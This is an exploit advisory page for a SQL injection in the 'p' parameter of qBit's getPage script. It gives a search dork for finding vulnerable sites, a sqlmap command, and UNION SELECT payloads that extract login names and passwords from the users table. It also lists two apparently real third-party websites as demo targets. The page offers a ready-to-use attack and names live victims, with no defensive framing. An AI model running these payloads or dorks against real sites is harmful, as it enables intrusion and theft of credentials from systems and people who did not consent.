QBit getPage Parameter SQL Injection

Posted on 30 November -0001
<HTML><HEAD><TITLE>qBit getPage Parameter SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># ############################
# Exploit Title  : qBit 'getPage'  - 'p' Parameter SQL Injection
# Exploit Dork   : allinurl:"getPage?p="
# Exploit Date   : 19/08/2016
# Discovered By  : Dervish 
# Content  Me    : fb.com/alakber
#                  nakhiyev.alakhber@gmail.com
# Special Thanks : S3N4TOR , S4RC4SM , Region 20
# Greetz To      :  All Azerbaijan Hackers
# Tested On      : Kali , Ubuntu , Windows 7
# ############################
# Exploit 
# http://127.0.0.1/pages/getPage?p={parametr}"
# Admin Page 
# http://127.0.0.1/admin
# ############################
# SQLMAP Poc
# ./sqlmap.py  -u http://127.0.0.1/pages/getPage?p=parametr --dbs
# [+++++++++++++++++++++++++++]
# Manual Poc
# Login Data    : http://127.0.0.1/pages/getPage?p=-parametr" Union Select login,2,3,4,5,6,7,8,9 from users--+-" 
# Password Data : http://127.0.0.1/pages/getPage?p=-parametr" Union Select password,2,3,4,5,6,7,8,9 from users--+-" 
# ############################
# Demo Sites
# http://troy-vavilon.com/pages/getPage?p=gallery
# www.testbitep.net/aral/pages/pages/getPage?p=prom
# ############################
# Watch the video
# https://www.youtube.com/watch?v=-5Uy8DFzuHE
##############################</BODY></HTML>
TOP
Malware :

Last 20
Exploits :

Last 20